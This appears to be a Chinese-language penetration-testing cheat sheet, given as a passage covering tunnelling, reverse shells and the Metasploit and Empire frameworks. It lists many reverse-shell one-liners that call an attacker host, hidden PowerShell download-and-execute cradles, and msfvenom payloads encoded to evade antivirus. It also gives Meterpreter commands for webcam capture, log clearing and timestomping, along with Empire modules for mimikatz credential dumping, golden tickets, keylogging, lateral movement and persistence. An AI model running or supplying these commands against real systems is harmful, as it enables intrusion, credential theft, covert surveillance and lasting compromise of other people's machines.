>Invoke-SocksProxy -bindPort 12138 建立socks代理,使用代理软件连接

image image

SSF

单层网络正向转发

https://github.com/securesocketfunneling/ssf/releases
内网机执行:
>ssfd.exe -p 1080

image

边界机器执行
>ssf.exe -L 12138:10.1.1.108:22 -p 1080 192.168.0.98 
把内网10.1.1.108的SSH转发出来

image

边界机器访问内网端口

image

单层网络反向转发

边界机器执行:
>ssfd.exe -p 1080

image

内网机器执行:
>ssf.exe -R 12138:10.1.1.108:22 -p 1080 192.168.0.106

image image

Netsh

边界机器执行:
>netsh interface portproxy add v4tov4 listenaddress=192.168.0.98 listenport=2222 connectaddress=10.1.1.108 connectport=22
将内网10.1.1.108主机22端口转发至本机2222端口,攻击机连接边界机器2222端口即可访问内网SSH

image

>netsh interface portproxy add v4tov4 listenaddress=192.168.0.98 listenport=13389 connectaddress=192.168.0.98 connectport=3389
当靶机某服务只允许内网访问时,将端口转发出来

image

添加防火墙规则:
>netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localip=192.168.0.98 localport=13389 action=allow
列出所有转发规则:
>netsh interface portproxy show all

image

删除指定的端口转发规则:
>netsh interface portproxy delete v4tov4 listenport=13389 listenaddress=192.168.0.98
删除所有转发规则:
>netsh interface portproxy reset

Iptables

需开启ip转发功能
>vim /etc/sysctl.conf设置net.ipv4.ip_forward=1

image image

本地端口22转发到2222上
>iptables -t nat -A PREROUTING -p tcp --dport 2222 -j REDIRECT --to-ports 22
内网98机器3389转到本机110的6789上
>iptables -t nat -A PREROUTING -d 192.168.0.110 -p tcp --dport 6789 -j DNAT --to-destination 192.168.0.98:3389
>iptables -t nat -A POSTROUTING -d 192.168.0.98 -p tcp --dport 3389 -j SNAT --to 192.168.0.110

image

查看规则
>iptables -t nat -L
删除规则
>iptables -t nat -D PREROUTING 1
删除全部规则
>iptables -t nat –F

chisel

https://github.com/jpillora/chisel
攻击机执行
>chisel server -p 12138 –reverse

image

靶机执行
>chisel client 公网攻击机IP:12138 R:1234:127.0.0.1:3389

image

建立成功后,攻击机连接本机1234端口即可访问靶机3389

image

命令&控制

Interactive shell

>python -c 'import pty;pty.spawn("/bin/bash")'
>expect -c 'spawn bash;interact'

Script reverse shell

bash

>/bin/bash -i > /dev/tcp/attackerip/4444 0<&1 2>&1

image

>bash -i >& /dev/tcp/attackerip/4444 0>&1

image

>0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196

image

>msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=4444 -o shell.sh

image

nc

>nc -e /bin/sh attackerip 4444
>nc -Lp 31337 -vv -e cmd.exe
&
>mknod backpipe p; nc 192.168.0.107 12138 0<backpipe | /bin/bash 1>backpipe
>nc 192.168.0.10 31337

telnet

>mknod backpipe p; telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe

php

#php -r '$sock=fsockopen("IP",port);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.0.107/1234 0>&1'");?>

python

>python -c ' import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); p=subprocess.call(["/bin/bash","-i"]); '
>msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
>import socket,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('IP',端口)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)

perl

>perl -e 'use Socket;$i=" attackerip ";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
>perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
>perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'  #####windows

ruby

>ruby -rsocket -e'f=TCPSocket.open("attackerip ",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
>ruby -rsocket -e 'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'   #####windows

OpenSSL encrypt shell

生成证书
>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

image

Linux

监听
>openssl s_server -quiet -key key.pem -cert cert.pem -port 1337

image

靶机执行
>mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.108:1337 > /tmp/s; rm /tmp/s

image

此方式使用TLS1.2 协议对通信进行加密

Windows

攻击机需监听2个端口,一个端口发送命令,一个端口接收回显
发送
>openssl s_server -quiet -key key.pem -cert cert.pem -port 1337
接收
>openssl s_server -quiet -key key.pem -cert cert.pem -port 1338
靶机执行
>openssl s_client -quiet -connect 192.168.0.108:1337|cmd.exe|openssl s_client -quiet -connect 192.168.0.108:1338

image image image

Dnscat2

安装dnscat2
>apt-get -y install ruby-dev git make g++
>gem install bundler
>git clone https://github.com/iagox86/dnscat2.git
>cd dnscat2/server
>bundle install
执行
>ruby dnscat2.rb abc.com -e open --no-cache

image

Powercat

靶机执行
>powercat -c 192.168.0.108 -v -dns abc.com -e cmd.exe

image

dnscat2执行
>session -i 1进入会话

image

Dnscat2 exe

Linux
https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-x86.tar.bz2 https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-x64.tar.bz2
https://downloads.skullsecurity.org/dnscat2/dnscat2-v0.07-client-win32.zip
攻击机执行
>ruby dnscat2.rb --dns "domain=zone.com,host=192.168.0.108" --no-cache
靶机执行
>dnscat2-v0.07-client-win32.exe --dns server=192.168.0.108

image

攻击机执行
>session -i [ID]进入会话

image image

DNS TXT Command

https://github.com/samratashok/nishang/Utility/Out-DnsTxt.ps1
https://github.com/samratashok/nishang/Backdoors/DNS_TXT_Pwnage.ps1
新建一个psh文件,使用out-dnstxt转换,这里的命令是net user

image image

y0stUSgtTi3i5QIA
添加一条域名txt记录,这里在本地设置,正常是在域名商的网站里配置

image

还需创建两个txt记录,分别是指定开始和结束的字符串

image image

靶机执行
>Import-Module .\DNS_TXT_Pwnage.ps1
>DNS_TXT_Pwnage -startdomain start.zone.com -cmdstring cmd -commanddomain 1.zone.com -psstring start -psdomain zone.com -Subdomains 1 -StopString stop

image

Powershell

MSF+Powershell

反弹MSF
靶机
PS >IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1') 
PS >Invoke-Shellcode -payload windows/meterpreter/reverse_http -lhost 192.168.0.100 -lport 6666 -force
攻击机:
>use exploit/multi/handler
>set payload windows/x64/meterpreter/reverse_ https
>run
或
>msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.100 LPORT=4444 -f powershell -o /var/www/html/ps
>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/powersploit/CodeExecution/Invoke-Shellcode.ps1")
>IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.100/ps")
>Invoke-Shellcode -Shellcode ($buf)
或
>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f psh-reflection >/var/www/html/a.ps1
>powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.101/a.ps1')"

Powercat

>powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')
正向连接
靶机:powercat -l -p 8080 -e cmd.exe –v
攻击机:nc 192.168.0.1 8080 –vv
反向连接:
攻击机:nc –l –p 8080 –vv
靶机:powercat –c 192.168.0.1 –p 8080 –v –e cmd.exe
远程执行
>powershell -nop -w hidden -ep bypass "IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.0.107/ps/powercat/powercat.ps1'); powercat -c 192.168.0.107 -p 12345 -v -e cmd.exe"
正向连接
靶机:powercat -l -p 8080 -e cmd.exe -v
攻击机:nc 192.168.0.1 8080 -vv
反向连接:
攻击机:nc -l -p 8080 -vv
靶机:powercat -c 192.168.0.1 -p 8080 -v -e cmd.exe

image

Nishang

Bind shell
靶机:
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Bind -Port 12138"
攻击机:
>nc 靶机IP 12138
反向shell
攻击机:
>nc -vnlp 9999
靶机:
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 9999"
UDP反向shell
攻击机:
>nc -lvup 12138
靶机:
>powershell -nop -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 攻击机IP -port 12138"
HTTPS
攻击机:
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Shells/Invoke-PoshRatHttps.ps1'); Invoke-PoshRatHttps -IPAddress 192.168.0.98 -Port 8080 -SSLPort 443"  IP地址是本机IP

image

靶机:
>powershell -w hidden -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.98:8080/connect')

image

ICMP
攻击机IP:108
靶机IP:100
https://github.com/inquisb/icmpsh
靶机执行
>powershell -nop -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/nishang/Shells/Invoke-PowerShellIcmp.ps1');Invoke-PowerShellIcmp 192.168.0.108

image

攻击机执行,开启相应ICMP ECHO请求
>sysctl -w net.ipv4.icmp_echo_ignore_all=1
>./icmpsh_m.py 192.168.0.108 192.168.0.100

image

Base64

>Powershell "$string="net user";[convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($string))"

Metasploit

常规使用

#systemctl start postgresql.service 启动数据库服务
#msfdb init 初始化数据库
#msfconsole进入MSF框架
#search  ms17-010 查找攻击模块
#use exploit/windows/smb/ms17_010_eternalblue 使用模块 
#set payload windows/x64/meterpreter/reverse_tcp 设置载荷
#info 查看信息
#show options查看需要设置的参数
#set RHOST 192.168.125.138设置参数
#exploit 执行攻击模块
#back 回退

技巧使用

#handler -H 192.168.0.10 -P 3333 -p windows/x64/meterpreter/reverse_tcp快速监听
#setg 设置全局参数
#set autorunscript migrate –f 自动迁移进程
#set autorunscript migrate -n explorer.exe
#set AutoRunScript post/windows/manage/migrate
#set prependmigrate true 自动注入进程
#set prependmigrateProc svchost.exe
#set exitonsession false获取到session后继续监听,获得多个session
#set stagerverifysslcert false 防止出现ssl错误
#set SessionCommunicationTimeout 0 防止session超时退出
#set SessionExpirationTimeout 0 防止强制关闭session
#exploit -j -z  后台持续监听
>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12138 -e x86/shikata_ga_nai -b "x00" -i 5 -a x86 --platform windows PrependMigrate=true PrependMigrateProc=explorer.exe -f exe -o  1.exe 执行后注入到已存在的一个进程
>set EnableStageEncoding true
>set stageencoder x86/fnstenv_mov 编码进行免杀
>set stageencodingfallback false

模块

Auxiliary
#show auxiliary 查看所有模块
Payload
#show payloads 查看所有攻击载荷
Payload是目标被攻击时执行的实际功能代码
生成载荷
#use exploit/multi/script/web_delivery
>set target 2
>msfvenom --list payloads 列出所有payload
>msfvenom --list encoders 列出所有编码器
Windows
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe -o /root/1.exe
#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o 1.exe
#msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f psh-reflection >xxx.ps1
#msfvenom -a x64 --platform windows -p windows/powershell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
>msfvenom -p windows/shell_hidden_bind_tcp LHOST=192.168.0.1 LPORT=11111  -f exe> /root/1.exe  生成NC正向连接
>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f exe> 1.exe 生成NC反向连接
Linux
#msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -e -f elf -a x86 --platform linux -o shell
#msfvenom -p cmd/unix/reverse_bash LHOST=192.168.0.1 LPORT=11111 -f raw > shell.sh
MacOS
#msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f macho > shell.macho
Web
#msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.php
#msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f war > shell.war
#msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f aspx -o payload.aspx
#msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.jsp
#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f asp > shell.asp
Android
#msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f apk -o payload.apk
#msfvenom -a dalvik -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 -f raw > shell.apk
#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=12138 R > test.apk
shellcode
#msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.0.1 LPORT=11111 -f c –o /root/1.c
#msfvenom -p cmd/unix/reverse_python LHOST=192.168.0.1 LPORT=11111 -o shell.py
#msfvenom -a python -p python/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw > shell.py
#msfvenom -p cmd/unix/reverse_perl LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.pl
#msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.rb
#msfvenom -p cmd/unix/reverse_lua LHOST=192.168.0.1 LPORT=11111 -f raw -o payload.lua
msf设置监听
#use exploit/multi/handler
#set payloadwindows/meterpreter/reverse_http 指定相应的payload
#set LHOST 192.168.0.1
#set LPORT 11111
#exploit -j 后台监听
或在exploit模块中直接使用set payload 命令指定payload

Meterpreter

交互
当攻击成功后会返回会话,使用session -l命令列出当前获取到的会话
#session -l
使用
#sessions -i id 来进入一个会话进行交互
#background 将当前会话放置后台
#sessions -x检查心跳
#sessions -u [ID] cmdshell升级meterpreter shell
提权
提权详见提权模块
命令
#shell 进入目标cmdshell
#uictl [enable/disable] [keyboard/mouse/all]  开启或禁止键盘/鼠标
#uictl disable mouse  禁用鼠标
#uictl disable keyboard  禁用键盘
#webcam_list   查看摄像头
#webcam_snap   通过摄像头拍照
#webcam_stream  通过摄像头开启视频
#execute -H -i -f cmd.exe 执行cmd.exe,-H不可见,-i交互 
#execute -H -m -d calc.exe -f wce.exe -a "-o 1.txt" 隐藏执行
#ps查看当前活跃进程
#migrate pid     迁移进程
#kill pid   #杀死进程
文件操作
#pwd 查看当前目录
#ls 列出当前目录文件
#search -f *pass*        搜索文件
#cat c:\\passwd.txt   查看文件内容
#upload /tmp/pwn.txt C:\\1.txt   上传文件
#download c:\\passwd.txt /tmp/  下载文件
#edit c:\\1.txt  编辑或创建文件
#rm C:\\1.txt 删除文件
#mkdir folder  创建文件夹
#rmdir folder  删除文件夹
#lcd /tmp   #攻击者主机 切换目录
#timestomp -v C://2.txt   #查看时间戳
#timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt
后渗透&权限维持
路由添加,socks建立,后门建立等查看
查看后门&持久化板块
清理日志
#clearev 

MSF派生Cobalt strike和Empire

派生Empire
Empire创建一个Listener
创建一个stager选择windows/dll
MSF使用
>use post/windows/manage/reflective_dll_inject 
指定session,dll的路径,进程pid
派生Cobalt Strike
cobalt 开启一个监听器windows/beacon_http/reverse_http
msf 
>use exploit/windows/manage/payload_inject
指定IP、端口、payload即可

Empire

安装

#git clone https://github.com/EmpireProject/Empire.git
#cd Empire/setup
#./install.sh

监听

(Empire) > listeners
(Empire: listeners) > uselistener http
(Empire: listeners) > info 查看参数信息
(Empire: listeners/http) > set Name y
(Empire: listeners/http) > set Host http://192.168.0.1
(Empire: listeners/http) > set Port 8080
(Empire: listeners/http) > execute
>back命令返回listeners模块
>list查看已激活的listener
>kill http删除监听

生成

(Empire: listeners) > usestager windows/launcher_vbs (双击tab键查看所有模块)
(Empire: stager/windows/launcher_vbs) > info
必须设置listener的名字,可设置生成位置
(Empire: stager/windows/launcher_vbs) > set Listener y
(Empire: stager/windows/launcher_vbs) > execute
可生成vbs,靶机执行即可上线。
使用launcher命令直接生成powershell或python脚本
>launcher powershell Listener-Name
使用rename对agents更名
>rename 6NMCW4ZB target1
使用main命令放回主菜单
>list stale 列出失去权限的机器
>remove stale 去除失去权限的机器

连接靶机及其他操作

>interact target1 连接
>agent 返回靶机列表
>back 返回上一层
>shell net user 1 1 /add 执行系统目录格式
>mimikazt 加载模块获取密码
>creds 整理获取的密码,creds export /root/1.txt 保存密码,creds hash/plaintext,显示格式
>sc 获取当前桌面截图,文件存储在./Empire/download/agent名字/screenshot
>download c:\pass.txt 下载靶机文件到本机
>upload hacked.txt c:\hacked.txt 上传本机文件到靶机

提权

>agents 列表中Username没有星号则需要提权
>bypassuac listener需指定一个监听器 提权
>usemodule privesc/ms16-032需指定一个监听器 提权
>usemodule privesc/powerup/allchecks执行所有脚本检查漏洞

横向

查询域管登录机器
>usemodule situational_awareness/network/powerview/user_hunter
令牌窃取
>mimikatz
>creds  获取并整理hash及密码
>pth {ID}窃取管理员令牌
>steal_token {PID}
会话注入
>ps 查看进程
>usemodule management/psinject 设置ProcIP和Listener
Hash传递
Invoke-PsExec可能会被查杀
>usemodule situational_awareness/network/powerview/find_localadmin_access 列出可PSexec横向移动的机器
>usemodule lateral_movement/invoke_psexec需设置ComputerName和Listener
或
>usemodule lateral_movement/invoke_wmi需设置ComputerName和Listener,credID
跨域
父域域控:dc.zone.com
子域域控:sub.zone.com
子域计算机:pc.sub.zone.com
子域普通用户:sub\user1
查看信任关系
>usemodule situational_awareness/network/powerview/get_domain_trust
获取父域krbtgt SID,使用management/user_to_sid获取sid
需设置Domain和User=krbtgt
>usemodule credentials/mimikatz/dcsync 设置UserName 子域\krbtgt 获取子域hash
>usemodule credentials/mimikatz/golden_ticket 伪造sid 
需设置User为伪造用户 sids伪造的标识符{krbtgt sid}-519
>usemodule credentials/mimikatz/dcsync 获取父域krbtgt的hash
>usemodule credentials/mimikatz/golden_ticket 使用父域krbtgt进行PTH攻击,指定父域CredID,用户名和域
>shell dir \\dc.zone.com\c$

后门&持久化

映像劫持
>usemodule lateral_movement/invoke_wmi_debugger
设置Listener,ComputerName(大写),TargetBinary(sethc.exe, Utilman.exe, osk.exe, Narrator.exe, Magnify.exe),分别是粘滞键,轻松访问,屏幕键盘,讲述人,放大镜。
注入注册表启动项
>usemodule persistence/elevated/registry*
设置Listener,注册表路径RegPath [HKLM\software\microsoft\windows\currentversion\run]
计划任务
>usemodule persistence/elevated/schtasks*
设置Listener和DailyTime
WMI
>usemodule persistence/elevated/wmi
设置Listener
注入SSP
查看SSP章节

Collection(信息采集)

Collection(信息采集)

模块名 功能
collection/ChromeDump 收集chrome浏览器保存的密码和浏览历史记录
collection/FoxDump 收集Firefox浏览器保存的密码和浏览历史记录
collection/USBKeylogger* 利用ETW作为键盘记录
collection/WebcamRecorder 从摄像头捕获视频
collection/browser_data 搜索浏览器历史记录或书签
collection/clipboard_monitor 按指定的时间间隔监视剪贴板
collection/file_finder 查找域中的敏感文件
collection/find_interesting_file 查找域中的敏感文件
collection/get_indexed_item 获取Windows desktop search索引文件
collection/get_sql_column_sample_data 从目标SQL Server返回列信息。
collection/get_sql_query 在目标SQL服务器上执行查询
collection/inveigh Windows PowerShell LLMNR/mDNS/NBNS中间人工具
collection/keylogger 键盘记录到keystrokes.txt文件中,文件位置/downloads/agentname/keystrokes.txt/agentname
collection/minidump 进程的全内存转储,PowerSploit的Out-Minidump.ps1
collection/netripper 将NetRipper注入目标进程,该进程使用API挂钩以拦截来自低特权用户的网络流量和与加密相关的功能,从而能够在加密之前/解密之后捕获纯文本流量和加密流量。
collection/ninjacopy* 通过读取原始卷并解析NTFS结构,从NTFS分区卷中复制文件。
collection/packet_capture* 使用netsh在主机上启动数据包捕获。
collection/prompt 提示当前用户在表单框中输入其凭据,然后返回结果。
collection/screenshot 屏幕截图
collection/vaults/add_keepass_config_trigger 寻找KeePass配置
collection/vaults/find_keepass_config 此模块查找并解析KeePass.config.xml (2.X)和KeePass.config.xml (1.X)文件。
collection/vaults/get_keepass_config_trigger 该模块从KeePass 2.X配置XML文件中提取触发器说明
collection/vaults/keethief 此模块检索未锁定的KeePass数据库的database mastey key信息
collection/vaults/remove_keepass_config_trigger 该模块从Find-KeePassConfig找到的所有KeePass配置中删除所有触发器
>usemodule collection/ tab补齐查看模块
>usemodule collection/screenshot 获取当前桌面截图,文件存储在./Empire/download/agent名字/screenshot
>usemodule collection/keylogger 键盘记录,文件存储在./Empire/download/agent名字/agent.log
>usemodule situational_awareness/host/winenum 查看当前用户、AD组、剪切板内容、系统版本、共享、网络信息、防火墙规则
>usemodule situational_awareness/network/powerview/share_finder 列出域内所有共享
>usemodule situational_awareness/network/arpscan 
>set Range 192.168.0.1-192.168.0.100 ARP扫描,需设置扫描网段区间
>usemodule situational_awareness/network/portscan 
>set Hosts 192.168.0.1-192.168.0.100 端口扫描,需设置IP或IP段
>usemodule situational_awareness/network/reverse_dns DNS信息,需设置IP
>set Range 192.168.0.1-192.168.0.100
>usemodule situational_awareness/network/powerview/get_domain_controller 查找域控

Code_execution(代码执行)

模块名 功能
code_execution/invoke_dllinjection 使用PowerSploit的Invoke-DLLInjection将Dll注入您选择的进程ID。
code_execution/invoke_metasploitpayload 生成一个新的隐藏PowerShell窗口,该窗口下载并执行Metasploit Payload。这与Metasploit模块theexploit/multi/scripts/web_delivery互动
code_execution/invoke_ntsd 使用NT Symbolic Debugger执行Empire launcher代码
code_execution/invoke_reflectivepeinjection 使用PowerSploit的Invoke-ReflectivePEInjection进行反射PE注入,将DLL/EXE加载进PowerShell进程中,或者将DLL加载进远程进程中
code_execution/invoke_shellcode 使用PowerSploit的Invoke--Shellcode注入Shellcode
code_execution/invoke_shellcodemsil 执行shellcode

Credentials(身份凭证)

模块名 功能
credentials/credential_injection* 运行PowerSploit的Invoke-CredentialInjection创建具有明文凭证的登录,而不会触发事件ID 4648使用显式凭据尝试登录
credentials/enum_cred_store 从Windows凭据管理器中转储当前交互用户的纯文本凭据
credentials/invoke_kerberoast 为具有非空服务主体名称(SPN)的所有用户请求kerberos票据,并将其提取为John或Hashcat可用格式
credentials/powerdump* 使用Posh-SecMod的Invoke-PowerDump从本地系统中转储哈希
credentials/sessiongopher 提取WinSCP已保存的会话和密码
credentials/tokens 运行PowerSploit的Invoke-TokenManipulation枚举可用的登录令牌,并使用它们创建新的进程
credentials/vault_credential* 运行PowerSploit的Get-VaultCredential以显示Windows Vault凭证对象,包括明文Web凭证
credentials/mimikatz/cache* 运行PowerSploit的Invoke-Mimikatz函数以提取MSCache(v2) hashes
credentials/mimikatz/certs* 运行PowerSploit的Invoke-Mimikatz函数将所有证书提取到本地目录
credentials/mimikatz/command* 使用自定义命令运行PowerSploit的Invoke-Mimikatz函数
credentials/mimikatz/dcsync 运行PowerSploit的Invoke-Mimikatz函数,以通过Mimikatz的lsadump::dcsync模块提取给定的帐户密码
credentials/mimikatz/dcsync_hashdump 运行PowerSploit的Invoke-Mimikatz函数,以使用Mimikatz的lsadump::dcsync模块收集所有域哈希
credentials/mimikatz/extract_tickets 运行PowerSploit的Invoke-Mimikatz函数,以base64编码形式从内存中提取kerberos票据
credentials/mimikatz/golden_ticket 运行PowerSploit的Invoke-Mimikatz函数以生成黄金票据并将其注入内存
credentials/mimikatz/keys* 运行PowerSploit的Invoke-Mimikatz函数以将所有密钥提取到本地目录
credentials/mimikatz/logonpasswords* 运行PowerSploit的Invoke-Mimikatz函数以从内存中提取纯文本凭据。
credentials/mimikatz/lsadump* 运行PowerSploit的Invoke-Mimikatz函数以从内存中提取特定的用户哈希。 在域控制器上很有用。
credentials/mimikatz/mimitokens* 运行PowerSploit的Invoke-Mimikatz函数以列出或枚举令牌。
credentials/mimikatz/pth* 运行PowerSploit的Invoke-Mimikatz函数以执行sekurlsa::pth来创建一个新进程。
credentials/mimikatz/purge 运行PowerSploit的Invoke-Mimikatz函数从内存中清除所有当前的kerberos票据
credentials/mimikatz/sam* 运行PowerSploit的Invoke-Mimikatz函数从安全帐户管理器(SAM)数据库中提取哈希
credentials/mimikatz/silver_ticket 运行PowerSploit的Invoke-Mimikatz函数,以生成服务器/服务的白银票据并将其注入内存。
credentials/mimikatz/trust_keys* 运行PowerSploit的Invoke-Mimikatz函数,从域控制器中提取域信任密钥。

Exfiltration(数据窃取)

模块名 功能
exfiltration/egresscheck 可用于帮助检查主机与客户端系统之间的出口,详细信息:https://github.com/stufus/egresscheck-framework
exfiltration/exfil_dropbox 下载文件到dropbox

Exploitation(漏洞利用EXP)

模块名 功能
exploitation/exploit_eternalblue MS17_010永恒之蓝漏洞利用
exploitation/exploit_jboss Jboss漏洞利用
exploitation/exploit_jenkins 在未授权访问的Jenkins脚本控制台上运行命令

Lateral_movement(横向移动)

模块名 功能
lateral_movement/inveigh_relay smb中继攻击
lateral_movement/invoke_dcom 使用DCOM在远程主机上执行stager
lateral_movement/invoke_executemsbuild 该模块利用WMI和MSBuild编译并执行一个包含Empire launcher的xml文件。
lateral_movement/invoke_psexec PsExec横向移动
lateral_movement/invoke_psremoting 远程PowerShell横向移动
lateral_movement/invoke_smbexec SMBExec横向移动
lateral_movement/invoke_sqloscmd 利用xp_cmdshell横向移动
lateral_movement/invoke_sshcommand 利用SSH横向移动
lateral_movement/invoke_wmi 利用WMI横向移动
lateral_movement/invoke_wmi_debugger 使用WMI将远程机器上的二进制文件的调试器设置为cmd.exe或stager
lateral_movement/jenkins_script_console 利用未授权访问的Jenkins脚本控制台横向移动
lateral_movement/new_gpo_immediate_task 利用GPO中的计划任务横向移动

Management(管理)

模块名 功能
management/enable_rdp* 在远程计算机上启用RDP并添加防火墙例外。
management/disable_rdp* 在远程计算机上禁用RDP
management/downgrade_account 在给定的域帐户上设置可逆加密,然后强制下次用户登录时设置密码。
management/enable_multi_rdp* 允许多个用户建立同时的RDP连接。
management/get_domain_sid 返回当前指定域的SID
management/honeyhash* 将人工凭证注入到LSASS
management/invoke_script 运行自定义脚本
management/lock 锁定工作站的显示
management/logoff 从计算机上注销当前用户(或所有用户)
management/psinject 利用Powershell注入Stephen Fewer形成的ReflectivePick,该ReflectivePick在远程过程中从内存执行PS代码
management/reflective_inject 利用Powershell注入Stephen Fewer形成的ReflectivePick,该ReflectivePick在远程过程中从内存执行PS代码
management/restart 重新启动指定的机器
management/runas 绕过GPO路径限制
management/shinject 将PIC Shellcode Payload注入目标进程
management/sid_to_user 将指定的域sid转换为用户
management/spawn 在新的powershell.exe进程中生成新agent
management/spawnas 使用指定的登录凭据生成agent
management/switch_listener 切换listener
management/timestomp 通过'调用Set-MacAttribute执行类似耗时的功能
management/user_to_sid 将指定的domain\user转换为domain sid
management/vnc Invoke-Vnc在内存中执行VNC代理并启动反向连接
management/wdigest_downgrade* 将计算机上的wdigest设置为使用显式凭据
management/zipfolder 压缩目标文件夹以供以后渗透
management/mailraider/disable_security 此函数检查ObjectModelGuard
management/mailraider/get_emailitems 返回指定文件夹的所有项目
management/mailraider/get_subfolders 返回指定顶级文件夹中所有文件夹的列表
management/mailraider/mail_search 在给定的Outlook文件夹中搜索项目
management/mailraider/search_gal 返回与指定搜索条件匹配的所有exchange users
management/mailraider/send_mail 使用自定义或默认模板将电子邮件发送到指定地址。
management/mailraider/view_email 选择指定的文件夹,然后在指定的索引处输出电子邮件项目

Persistence(持久化)

模块名 功能
persistence/elevated/registry* 计算机启动项持久化,通过HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run进行持久化,运行一个stager或者脚本
persistence/elevated/schtasks* 计划任务持久化
persistence/elevated/wmi* WMI事件订阅持久化
persistence/elevated/wmi_updater* WMI订阅持久化
persistence/misc/add_netuser 将域用户或本地用户添加到当前(或远程)计算机
persistence/misc/add_sid_history* 运行PowerSploit的Invoke-Mimikatz函数以执行misc::addsid以添加用户的sid历史记录。 仅适用于域控制器
persistence/misc/debugger* 将指定目标二进制文件的调试器设置为cmd.exe
persistence/misc/disable_machine_acct_change* 禁止目标系统的机器帐户自动更改其密码
persistence/misc/get_ssps 枚举所有已加载的安全软件包
persistence/misc/install_ssp* 安装安全支持提供程序dll
persistence/misc/memssp* 运行PowerSploit的Invoke-Mimikatz函数以执行misc::memssp,将所有身份验证事件记录到C:\Windows\System32\mimisla.log
